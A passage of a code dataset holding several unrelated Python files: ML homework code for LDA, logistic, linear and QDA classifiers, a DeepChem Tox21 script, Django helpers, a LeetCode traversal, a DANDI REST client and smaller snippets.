OPs\ntrain_labels = tf.placeholder(dtype=tf.float32, shape=[None, 1,])\nlogistic_weights = tf.Variable(initial_value=tf.random_uniform(shape=[3, 1]), dtype=tf.float32)\n\nmu = tf.sigmoid(tf.matmul(train, logistic_weights))\nD = tf.diag(tf.squeeze(tf.add(1.0, -mu)))\nlogistic_update = tf.matrix_inverse(tf.matmul(tf.matmul(tf.transpose(train), D), train))\nlogistic_update = tf.matmul(tf.matmul(logistic_update, tf.transpose(train)), tf.add(mu, -train_labels))\nlogistic_train_op = logistic_weights.assign(tf.add(logistic_weights,-logistic_update))\n\ninit_op = tf.global_variables_initializer()\n\n# Linear Regression OPs\nlinear_weights = tf.Variable(initial_value=tf.random_uniform(shape=[3, 1]), dtype=tf.float32)\nlinear_train_op = linear_weights.assign(\n tf.matmul(\n tf.matmul(tf.matrix_inverse(tf.matmul(tf.transpose(train), train)), tf.transpose(train)),\n train_labels)\n )\n\n# Do computations in Tensorflow!\nwith tf.Session() as sess:\n train_data = pd.read_table('hwk2data/' + CONFIG['TRAIN'], header=None)\n test_data = pd.read_table('hwk2data/' + CONFIG['TEST'], header=None)\n sess.run(init_op)\n\n # Q1 TF comps\n pi_mle, mu_0_mle, mu_1_mle, \\\n sigma_mle, sigma_mle_1, sigma_mle_2 = sess.run([pi_mle, mu_0_mle, mu_1_mle, sigma_mle, sigma_mle_1, sigma_mle_2],\n feed_dict={train: train_data, test: test_data})\n\n # Q2 TF comps\n train_data[3] = [1] * train_data.shape[0]\n\n logistic_weights = sess.run(logistic_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n previous_weights = np.array([0, 0, 0])\n\n step = 1\n while np.linalg.norm(logistic_weights.flatten()-previous_weights) > STOPPING: # Stopping criterion\n previous_weights = logistic_weights.flatten()\n logistic_weights = sess.run(logistic_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n #print('Updating weights for separating plane, step {} ...'.format(step))\n step += 1\n #print('Norm of change in weights ...')\n #print(np.linalg.norm(logistic_weights.flatten()-previous_weights))\n\n # Q3 TF comps\n linear_weights = sess.run(linear_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n\n\n#########################################################\n#################### Question 1 C #######################\n#########################################################\n\n# Implementing MLE for Mixture of Gaussians with shared Covariance to each Dataset.\n\n# Compute seperating plane\nm_0 = -np.dot(np.transpose(mu_0_mle), np.linalg.inv(sigma_mle))\nm_1 = -np.dot(np.transpose(mu_1_mle), np.linalg.inv(sigma_mle))\nb_0 = -0.5*np.dot(m_0, mu_0_mle) + np.log(1-pi_mle)\nb_1 = -0.5*np.dot(m_1, mu_1_mle) + np.log(pi_mle)\nprint(\"Weights for LDA seperating line: \",(m_0-m_1)[0],(m_0-m_1)[1], b_0-b_1)\n\n\ndef line(x):\n return -(b_0-b_1 + (m_0[0]-m_1[0])*x)/(m_0[1]-m_1[1])\n\n# Plot data points\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\n# Overlay with contours of Normal Dist.\nx = np.linspace(-8, 8)\ny = np.linspace(-8, 8)\nX, Y = np.meshgrid(x, y)\nZ1 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle[0,0], sigmay=sigma_mle[1,1],\n mux=mu_0_mle[0], muy=mu_0_mle[1], sigmaxy=sigma_mle[1,0])\nZ2 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle[0,0], sigmay=sigma_mle[1,1],\n mux=mu_1_mle[0], muy=mu_1_mle[1], sigmaxy=sigma_mle[1,0])\nplt.contour(X, Y, Z1, colors='pink')\nplt.contour(X, Y, Z2, colors='turquoise')\n\nx = np.linspace(-2, 2)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - LDA'.format(CONFIG['DS']))\nplt.savefig('../img_{}_MoG'.format(CONFIG['DS']))\nplt.show()\n\n# Compute error rate\ndef get_error_rate(w_1,w_2, b, X_0, X_1, Y):\n tp = np.logical_and(np.add(w_1*X_0, w_2*X_1) + b > 0, Y == 1)\n tn = np.logical_and(np.add(w_1 * X_0, w_2 * X_1) + b < 0, Y == 0)\n error_rate = 1 - (np.sum(tp)+np.sum(tn))/X_0.shape[0]\n return(error_rate)\n\ntrain_rate = get_error_rate(w_1=(m_0 - m_1)[0], w_2=(m_0 - m_1)[1], b=(b_0-b_1),\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('MoG Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=(m_0 - m_1)[0], w_2=(m_0 - m_1)[1], b=(b_0-b_1),\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('MoG Testing rate: {}'.format(test_rate))\n\n#######################################################\n#################### Question 2 #######################\n#######################################################\n\n# Implementing Logistic Regression to each Dataset.\nprint(\"Weights for Logistic Regression: \", logistic_weights.flatten().tolist())\n\n\ndef line(x):\n return -(logistic_weights[2] + (logistic_weights[0])*x)/(logistic_weights[1])\n\n# Plot data points and seperating plane\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\nx = np.linspace(-3, 3)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - Logistic'.format(CONFIG['DS']))\n\nplt.savefig('../img_{}_Log'.format(CONFIG['DS']))\nplt.show()\n\ntrain_rate = get_error_rate(w_1=logistic_weights[0], w_2=logistic_weights[1], b=logistic_weights[2],\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('Logistic Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=logistic_weights[0], w_2=logistic_weights[1], b=logistic_weights[2],\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('Logistic Testing rate: {}'.format(test_rate))\n\n#######################################################\n#################### Question 3 #######################\n#######################################################\n\n# See Linear Regression weights for Dataset.\nprint(\"Weights for Linear Regression: \", linear_weights.flatten().tolist())\n\n\ndef line(x):\n return (0.5 - linear_weights[2] - (linear_weights[0])*x)/(linear_weights[1])\n\n# Plot data points and seperating plane\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\nx = np.linspace(-3, 3)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - Linear'.format(CONFIG['DS']))\n\nplt.savefig('../img_{}_Lin'.format(CONFIG['DS']))\nplt.show()\n\n# Compute error rate\ndef get_error_rate(w_1,w_2, b, X_0, X_1, Y):\n tp = np.logical_and(np.add(w_1*X_0, w_2*X_1) + b > 0.5, Y == 1)\n tn = np.logical_and(np.add(w_1 * X_0, w_2 * X_1) + b < 0.5, Y == 0)\n error_rate = 1 - ((np.sum(tp)+np.sum(tn))/X_0.shape[0])\n return(error_rate)\n\ntrain_rate = get_error_rate(w_1=linear_weights[0], w_2=linear_weights[1], b=linear_weights[2],\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('LR Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=linear_weights[0], w_2=linear_weights[1], b=linear_weights[2],\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('LR Testing rate: {}'.format(test_rate))\n\n#######################################################\n#################### Question 5 #######################\n#######################################################\n\n# Compute seperating plane\ns_mle_inv_1 = np.linalg.inv(sigma_mle_1)\ns_mle_inv_2 = np.linalg.inv(sigma_mle_2)\nb = 0.5*np.log(np.linalg.det(sigma_mle_2)/np.linalg.det(sigma_mle_1)) + np.log(pi_mle/(1-pi_mle)) \\\n - 0.5*np.dot(np.dot(np.transpose(mu_0_mle), s_mle_inv_1),mu_0_mle) \\\n + 0.5*np.dot(np.dot(np.transpose(mu_1_mle), s_mle_inv_2),mu_1_mle)\n\nm_x = np.dot(s_mle_inv_1, mu_0_mle)[0] - np.dot(s_mle_inv_2, mu_1_mle)[0]\nm_y = np.dot(s_mle_inv_1, mu_0_mle)[1] - np.dot(s_mle_inv_2, mu_1_mle)[1]\n\nm_x2 = -0.5*s_mle_inv_1[0,0] + 0.5*s_mle_inv_2[0,0]\nm_xy = -s_mle_inv_1[0,1] + s_mle_inv_2[0,1]\nm_y2 = -0.5*s_mle_inv_1[1,1] +0.5*s_mle_inv_2[1,1]\n\nprint(\"Weights for QDA seperating line: \", m_x, m_y, m_x2, m_xy, m_y2, b)\n\n# Plot data points\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\n# Overlay with contours of Normal Dist.\nx = np.linspace(-8, 8)\ny = np.linspace(-8, 8)\nx, y = np.meshgrid(x, y)\nZ1 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle_1[0,0], sigmay=sigma_mle_1[1,1],\n mux=mu_0_mle[0], muy=mu_0_mle[1], sigmaxy=sigma_mle_1[1,0])\nZ2 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle_2[0,0], sigmay=sigma_mle_2[1,1],\n mux=mu_1_mle[0], muy=mu_1_mle[1], sigmaxy=sigma_mle_2[1,0])\nplt.contour(X, Y, Z1, colors='pink')\nplt.contour(X, Y, Z2, colors='turquoise')\n\n\n# Compute error rate\ndef get_error_rate(X_0, X_1, Y):\n tp = np.logical_and(\n np.add(np.add(np.add(np.add(np.add(X_0*m_x, X_1*m_y), m_x2*X_0**2),\n m_xy*np.multiply(X_0, X_1)), m_y2*X_1**2), b) < 0, Y == 1)\n tn = np.logical_and(\n np.add(np.add(np.add(np.add(np.add(X_0*m_x, X_1*m_y), m_x2*X_0**2),\n m_xy*np.multiply(X_0,X_1)), m_y2*X_1**2), b) > 0, Y == 0)\n error_rate = 1 - ((np.sum(tp)+np.sum(tn))/X_0.shape[0])\n return(error_rate)\n\ntrain_rate = get_error_rate(X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('QDA Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('QDA Testing rate: {}'.format(test_rate))\n\nplt.contour(x, y, (x*m_x + y*m_y + m_x2*x**2 + m_xy*x*y + m_y2*y**2 + b), [0], colors='k')\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Conic - QGA'.format(CONFIG['DS']))\nplt.savefig('../img_{}_MoG_dm'.format(CONFIG['DS']))\nplt.show()\n\nprint('The learned parameters are:')\nprint('pi: {0} \\n mean 1: {1} \\n mean 2: {2} \\n Sigma 1: {3} \\n Sigma 2: {4}'\n .format(pi_mle, mu_0_mle, mu_1_mle, sigma_mle_1, sigma_mle_2))\n","sub_path":"IFT6269/A2/A2Code/A2Code.py","file_name":"A2Code.py","file_ext":"py","file_size_in_byte":13007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"271539237","text":"\n\n#calss header\nclass _PULLEY():\n\tdef __init__(self,): \n\t\tself.name = \"PULLEY\"\n\t\tself.definitions = [u'a piece of equipment for moving heavy objects up or down, consisting of a small wheel over which a rope or chain attached to the object can be easily raised or lowered: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_pulley.py","file_name":"_pulley.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"263428925","text":"#--MUNDO 3--\r\n#Desafio 72\r\n'''\r\nCrie um programaa que tenha uma Tupla totalmente preenchida com uma contagem por extenso, de ZERO até VINTE.\r\nO programa deverá ler um número pelo teclado (entre 0 e 20) e mostrá-lo por extenso.\r\nO programa deverá também verificar se o usuário digitou o intervalo correto (0 a 20).\r\nEx.: Digite um numero entre 0 e 20: 90 (erro! tente novamente!)\r\nEx.: Digite um numero entre 0 e 20: 16. (vc digitou o numero dezesseis)\r\n'''\r\nnumeros = ('Zero', 'Um', 'Dois', 'Três', 'Quatro', 'Cinco', 'Seis', 'Sete', 'Oito', 'Nove',\\\r\n 'Dez', 'Onze', 'Doze', 'Treze', 'Quatorze', 'Quinte', 'Dezesseis', 'Dezessete', 'Dezoito', 'Dezenove', 'Vinte')\r\n\r\nindice = int(input('Digite um número entre 0 e 20: '))\r\nwhile indice < 0 or indice > 20:\r\n print('Tente Novamente!')\r\n indice = int(input('Digite um número entre 0 e 20: '))\r\nprint('Você digitou o número {}'.format(numeros[indice]))\r\n\r\n","sub_path":"Desafio072.py","file_name":"Desafio072.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206152787","text":"\"\"\"\nTrain low-data Tox21 models with graph-convolution. Test last fold only.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport numpy as np\nnp.random.seed(123)\nimport tensorflow as tf\ntf.random.set_seed(123)\nimport deepchem as dc\nfrom datasets import load_tox21_convmol\n\n# 4-fold splits\nK = 4\n# num positive/negative ligands\nn_pos = 10\nn_neg = 10\nn_trials = 20\n\ntox21_tasks, dataset, transformers = load_tox21_convmol()\n\n# Define metric\nmetric = dc.metrics.Metric(dc.metrics.roc_auc_score, mode=\"classification\")\n\ntask_splitter = dc.splits.TaskSplitter()\nfold_datasets = task_splitter.k_fold_split(dataset, K)\n\ntrain_folds = fold_datasets[:-1]\ntrain_dataset = dc.splits.merge_fold_datasets(train_folds)\ntest_dataset = fold_datasets[-1]\n\n# Get supports on test-set\nsupport_generator = dc.data.SupportGenerator(test_dataset, n_pos, n_neg,\n n_trials)\n\n# Compute accuracies\ntask_scores = {task: [] for task in range(len(test_dataset.get_task_names()))}\n\nfor trial_num, (task, support) in enumerate(support_generator):\n print(\"Starting trial %d\" % trial_num)\n\n # Number of features on conv-mols\n n_feat = 75\n # Batch size of models\n batch_size = 50\n graph_model = dc.nn.SequentialGraph(n_feat)\n graph_model.add(dc.nn.GraphConv(64, n_feat, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.GraphConv(128, 64, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.GraphConv(64, 128, activation='relu'))\n graph_model.add(dc.nn.GraphPool())\n graph_model.add(dc.nn.Dense(128, 64, activation='tanh'))\n graph_model.add(dc.nn.GraphGather(batch_size, activation=\"tanh\"))\n\n model = dc.models.MultitaskGraphClassifier(\n graph_model,\n 1,\n n_feat,\n batch_size=batch_size,\n learning_rate=1e-3,\n learning_rate_decay_time=1000,\n optimizer_type=\"adam\",\n beta1=.9,\n beta2=.999)\n\n # Fit trained model\n model.fit(support, nb_epoch=10)\n\n # Test model\n task_dataset = dc.data.get_task_dataset_minus_support(test_dataset, support,\n task)\n y_pred = model.predict(task_dataset)\n score = metric.compute_metric(task_dataset.y, y_pred, task_dataset.w)\n print(\"Score on task %s is %s\" % (str(task), str(score)))\n task_scores[task].append(score)\n\n# Join information for all tasks.\nmean_task_scores = {}\nstd_task_scores = {}\nfor task in range(len(test_dataset.get_task_names())):\n mean_task_scores[task] = np.mean(np.array(task_scores[task]))\n std_task_scores[task] = np.std(np.array(task_scores[task]))\n\nprint(\"Mean scores\")\nprint(mean_task_scores)\nprint(\"Standard Deviations\")\nprint(std_task_scores)\nprint(\"Median of Mean Scores\")\nprint(np.median(np.array(mean_task_scores.values())))\n","sub_path":"examples/low_data/tox_graph_conv_one_fold.py","file_name":"tox_graph_conv_one_fold.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564893546","text":"import django\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nimport json\nimport six\n\ndef to_json(data):\n kw = {}\n if six.PY2:\n kw['encoding'] = 'utf-8'\n return json.dumps(data, cls=DjangoJSONEncoder, ensure_ascii=False, separators=(',',':'), **kw)\n\ndef pretty_diff(a, b):\n import diff_match_patch\n d = diff_match_patch.diff_match_patch()\n e = d.diff_main(a, b)\n return d.diff_prettyHtml(e)\n\ndef get_setting(name):\n \"\"\" Looks for settings under DJANGO_HISTORY_SETTINGS, supporting dot notation for nested lookups,\n eg. get_setting('EXCLUDE_CHANGES.fields') \"\"\"\n dh = getattr(settings, 'DJANGO_HISTORY_SETTINGS', {})\n result = None\n for k in name.split('.'):\n if dh is None:\n continue\n result = dh.get(k, None)\n dh = result\n return result\n\ndef get_relation(rel):\n django_version = '.'.join(map(str, django.VERSION[:2]))\n if django_version >= '1.8':\n instance = rel.related.model\n else:\n instance = rel.related.parent_model\n return instance\n","sub_path":"djangohistory/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624651036","text":"from django.contrib import admin\nfrom .models import Services_Data\n\nclass AdminService_Data(admin.ModelAdmin):\n list_display =['course_id',\n 'course_name',\n 'course_duration',\n 'course_start_date',\n 'course_start_time',\n 'course_trainer_name',\n 'course_trainer_exp']\nadmin.site.register(Services_Data, AdminService_Data)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474407958","text":"from contextlib import contextmanager\n\nimport requests\n\nfrom . import get_logger\nfrom .utils import ensure_datetime\nfrom .consts import MAX_CHUNK_SIZE\n\nlgr = get_logger()\n\n\n# Following class is loosely based on GirderClient, with authentication etc\n# being stripped.\n# TODO: add copyright/license info\nclass RESTFullAPIClient(object):\n \"\"\"A base class for REST clients\"\"\"\n\n def __init__(self, api_url):\n self.api_url = api_url\n self._session = None\n\n @contextmanager\n def session(self, session=None):\n \"\"\"\n Use a :class:`requests.Session` object for all outgoing requests.\n If `session` isn't passed into the context manager\n then one will be created and yielded. Session objects are useful for enabling\n persistent HTTP connections as well as partially applying arguments to many\n requests, such as headers.\n\n Note: `session` is closed when the context manager exits, regardless of who\n created it.\n\n .. code-block:: python\n\n with client.session() as session:\n session.headers.update({'User-Agent': 'myapp 1.0'})\n\n for item in items:\n client.downloadItem(item, fh)\n\n In the above example, each request will be executed with the User-Agent header\n while reusing the same TCP connection.\n\n :param session: An existing :class:`requests.Session` object, or None.\n \"\"\"\n self._session = session if session else requests.Session()\n\n try:\n yield self._session\n finally:\n # close only if we started a new one\n if not session:\n self._session.close()\n self._session = None\n\n def _request_func(self, method):\n if self._session is not None:\n return getattr(self._session, method.lower())\n else:\n return getattr(requests, method.lower())\n\n def send_request(\n self,\n method,\n path,\n parameters=None,\n data=None,\n files=None,\n json=None,\n headers=None,\n json_resp=True,\n **kwargs,\n ):\n \"\"\"\n This method looks up the appropriate method, constructs a request URL\n from the base URL, path, and parameters, and then sends the request. If\n the method is unknown or if the path is not found, an exception is\n raised, otherwise a JSON object is returned with the response.\n\n This is a convenience method to use when making basic requests that do\n not involve multipart file data that might need to be specially encoded\n or handled differently.\n\n :param method: The HTTP method to use in the request (GET, POST, etc.)\n :type method: str\n :param path: A string containing the path elements for this request.\n Note that the path string should not begin or end with the path separator, '/'.\n :type path: str\n :param parameters: A dictionary mapping strings to strings, to be used\n as the key/value pairs in the request parameters.\n :type parameters: dict\n :param data: A dictionary, bytes or file-like object to send in the body.\n :param files: A dictionary of 'name' => file-like-objects for multipart encoding upload.\n :type files: dict\n :param json: A JSON object to send in the request body.\n :type json: dict\n :param headers: If present, a dictionary of headers to encode in the request.\n :type headers: dict\n :param json_resp: Whether the response should be parsed as JSON. If False, the raw\n response object is returned. To get the raw binary content of the response,\n use the ``content`` attribute of the return value, e.g.\n\n .. code-block:: python\n\n resp = client.get('my/endpoint', json_resp=False)\n print(resp.content) # Raw binary content\n print(resp.headers) # Dict of headers\n\n :type json_resp: bool\n \"\"\"\n if not parameters:\n parameters = {}\n\n # Look up the HTTP method we need\n f = self._request_func(method)\n\n url = self.get_url(path)\n\n # Make the request, passing parameters and authentication info\n _headers = headers or {}\n\n if json_resp and \"accept\" not in _headers:\n _headers[\"accept\"] = \"application/json\"\n\n result = f(\n url,\n params=parameters,\n data=data,\n files=files,\n json=json,\n headers=_headers,\n **kwargs,\n )\n\n # If success, return the json object. Otherwise throw an exception.\n if not result.ok:\n raise requests.HTTPError(\n f\"Error {result.status_code} while sending {method} request to {url}\",\n response=result,\n )\n\n if json_resp:\n return result.json()\n else:\n return result\n\n def get_url(self, path):\n # Construct the url\n if self.api_url.endswith(\"/\") and path.startswith(\"/\"):\n path = path[1:]\n url = self.api_url + path\n return url\n\n def get(self, path, parameters=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'GET' HTTP method.\n \"\"\"\n return self.send_request(\"GET\", path, parameters, json_resp=json_resp)\n\n def post(\n self,\n path,\n parameters=None,\n files=None,\n data=None,\n json=None,\n headers=None,\n json_resp=True,\n ):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'POST' HTTP method.\n \"\"\"\n return self.send_request(\n \"POST\",\n path,\n parameters,\n files=files,\n data=data,\n json=json,\n headers=headers,\n json_resp=json_resp,\n )\n\n def put(self, path, parameters=None, data=None, json=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'PUT'\n HTTP method.\n \"\"\"\n return self.send_request(\n \"PUT\", path, parameters, data=data, json=json, json_resp=json_resp\n )\n\n def delete(self, path, parameters=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'DELETE' HTTP method.\n \"\"\"\n return self.send_request(\"DELETE\", path, parameters, json_resp=json_resp)\n\n def patch(self, path, parameters=None, data=None, json=None, json_resp=True):\n \"\"\"\n Convenience method to call :py:func:`send_request` with the 'PATCH' HTTP method.\n \"\"\"\n return self.send_request(\n \"PATCH\", path, parameters, data=data, json=json, json_resp=json_resp\n )\n\n\nclass DandiAPIClient(RESTFullAPIClient):\n def get_asset(self, dandiset_id, version, uuid):\n \"\"\"\n\n /dandisets/{version__dandiset__pk}/versions/{version__version}/assets/{uuid}/\n\n Parameters\n ----------\n dandiset_id\n version\n uuid\n\n Returns\n -------\n\n \"\"\"\n return self.get(f\"/dandisets/{dandiset_id}/versions/{version}/assets/{uuid}/\")\n\n def get_dandiset(self, dandiset_id, version):\n return self._migrate_dandiset_metadata(\n self.get(f\"/dandisets/{dandiset_id}/versions/{version}/\")\n )\n\n def get_dandiset_assets(self, dandiset_id, version, location=None, page_size=None):\n \"\"\"A generator to provide asset records\n \"\"\"\n if location is not None:\n raise NotImplementedError(\n \"location specific query. See https://github.com/dandi/dandi-publish/issues/77\"\n )\n # although we could just provide ad-hoc implementation here for now. TODO\n if page_size is not None:\n raise NotImplementedError(\"paginated query is not supported yet\")\n page_size = 1000000\n resp = self.get(\n f\"/dandisets/{dandiset_id}/versions/{version}/assets/\",\n parameters={\"page_size\": page_size},\n )\n try:\n assert not resp.get(\n \"next\"\n ), \"ATM we do not support pagination and result should have not been paginated\"\n assert not resp.get(\"prev\")\n results = resp.get(\"results\", [])\n assert len(results) == resp.get(\"count\")\n # Just some sanity checks for now, but might change, see\n # https://github.com/dandi/dandi-publish/issues/79\n assert all(\n r.get(\"version\", {}).get(\"dandiset\", {}).get(\"identifier\")\n == dandiset_id\n for r in results\n )\n assert all(r.get(\"version\", {}).get(\"version\") == version for r in results)\n except AssertionError:\n lgr.error(\n f\"Some expectations on returned /assets/ for {dandiset_id}@{version} are violated\"\n )\n raise\n # Things might change, so let's just return only \"relevant\" ATM information\n # under assumption that assets belong to the current version of the dataset requested\n # results_ = [\n # {k: r[k] for k in (\"path\", \"uuid\", \"size\", \"sha256\", \"metadata\") if k in r}\n # for r in results\n # ]\n for r in results:\n # check for paranoid Yarik with current multitude of checksums\n # r['sha256'] is what \"dandi-publish\" computed, but then\n # metadata could contain multiple digests computed upon upload\n metadata = r.get(\"metadata\")\n if (\n \"sha256\" in r\n and \"sha256\" in metadata\n and metadata[\"sha256\"] != r[\"sha256\"]\n ):\n lgr.warning(\"sha256 mismatch for %s\" % str(r))\n # There is no \"modified\" time stamp and \"updated\" also shows something\n # completely different, so if \"modified\" is not there -- we will try to\n # get it from metadata\n if \"modified\" not in r and metadata:\n uploaded_mtime = metadata.get(\"uploaded_mtime\")\n if uploaded_mtime:\n r[\"modified\"] = ensure_datetime(uploaded_mtime)\n yield r\n\n def get_dandiset_and_assets(self, dandiset_id, version, location=None):\n \"\"\"This is pretty much an adapter to provide \"harmonized\" output in both\n girder and DANDI api clients.\n\n Harmonization should happen toward DADNDI API BUT AFAIK it is still influx\n \"\"\"\n # Fun begins!\n location_ = \"/\" + location if location else \"\"\n lgr.info(f\"Traversing {dandiset_id}{location_} (version: {version})\")\n\n # TODO: get all assets\n # 1. includes sha256, created, updated but those are of \"girder\" level\n # so lack \"uploaded_mtime\" and uploaded_nwb_object_id forbidding logic for\n # deducing necessity to update/move. But we still might want to rely on its\n # sha256 instead of metadata since older uploads would not have that metadata\n # in them\n # 2. there is no API to list assets given a location\n #\n # Get dandiset information\n dandiset = self.get_dandiset(dandiset_id, version)\n # TODO: location\n assets = self.get_dandiset_assets(dandiset_id, version, location=location)\n return dandiset, assets\n\n def get_download_file_iter(\n self, dandiset_id, version, uuid, chunk_size=MAX_CHUNK_SIZE\n ):\n url = self.get_url(\n f\"/dandisets/{dandiset_id}/versions/{version}/assets/{uuid}/download/\"\n )\n\n def downloader(start_at=0):\n lgr.debug(\"Starting download from %s\", url)\n headers = None\n if start_at > 0:\n headers = {\"Range\": f\"bytes={start_at}-\"}\n result = (self._session if self._session else requests).get(\n url, stream=True, headers=headers\n )\n # TODO: apparently we might need retries here as well etc\n # if result.status_code not in (200, 201):\n result.raise_for_status()\n\n for chunk in result.raw.stream(chunk_size, decode_content=False):\n if chunk: # could be some \"keep alive\"?\n yield chunk\n\n return downloader\n\n # TODO: remove when API stabilizes\n\n # Should perform changes in-place but also return the original record\n\n @classmethod\n def _migrate_dandiset_metadata(cls, dandiset):\n dandiset_metadata = dandiset.get(\"metadata\", {})\n if not dandiset_metadata:\n return dandiset\n # DANDI API has no versioning yet, and things are in flux.\n # It used to have metadata within a key... just in case let's also\n # be able to handle \"old\" style\n if \"identifier\" not in dandiset_metadata and \"dandiset\" in dandiset_metadata:\n dandiset[\"metadata\"] = dandiset_metadata.pop(\"dandiset\")\n return dandiset\n","sub_path":"dandi/dandiapi.py","file_name":"dandiapi.py","file_ext":"py","file_size_in_byte":13066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603892491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 19 15:43:47 2016\n\n@author: zhengyaolin\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n self.nodes = []\n result = []\n if root is not None:\n self.nodes.append(root)\n self.pre_traverse(root)\n for i in self.nodes:\n result.append(i.val)\n return result\n \n def pre_traverse(self, node):\n if node.left is None and node.right is None:\n return\n if node.left is not None:\n self.nodes.append(node.left)\n self.pre_traverse(node.left)\n if node.right is not None:\n self.nodes.append(node.right)\n self.pre_traverse(node.right)\n\n","sub_path":"LeetCode/BTPreorderTraversal.py","file_name":"BTPreorderTraversal.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491468280","text":"import time\nimport warnings\nfrom typing import Tuple, Sequence, Union\n\nimport torch\nimport torch.nn as nn\nimport sbi.utils as utils\n\n\n# XXX standardize? zscore?\n# XXX want to insert it in Sequential\nclass Normalize(nn.Module):\n def __init__(self, mean, std):\n super(Normalize, self).__init__()\n self.mean = mean\n self.std = std\n\n def forward(self, tensor):\n # XXX guard against std \\sim 0 (epsilon or raise)\n return (tensor - self.mean) / self.std\n\n\ndef match_shapes_of_inputs_and_contexts(\n inputs: Union[Sequence[float], float],\n context: Union[Sequence[float], float],\n true_context: torch.Tensor,\n correct_for_leakage: bool,\n) -> (torch.Tensor, torch.Tensor):\n \"\"\"\n Formats inputs and contexts into shapes that can be processed by neural density\n estimators.\n\n Neural density estimators require the first dimension of inputs and contexts to\n match, `inputs.shape == (N, dim_inputs)` and `context.shape == (N, dim_context)`,\n with N being the number of data points where we evaluate the density estimator.\n In this function, we match the shape of context to the shape of inputs.\n Assume that x is the context, x_o is the true_context, theta are inputs/parameters.\n If context has shape (dim_x) or (1, dim_x), we build\n `context = torch.tensor([x, x,..., x])` such that we can later evaluate\n p(theta_n|x) for every parameter set theta_n in inputs\n If context is None, we build `context = 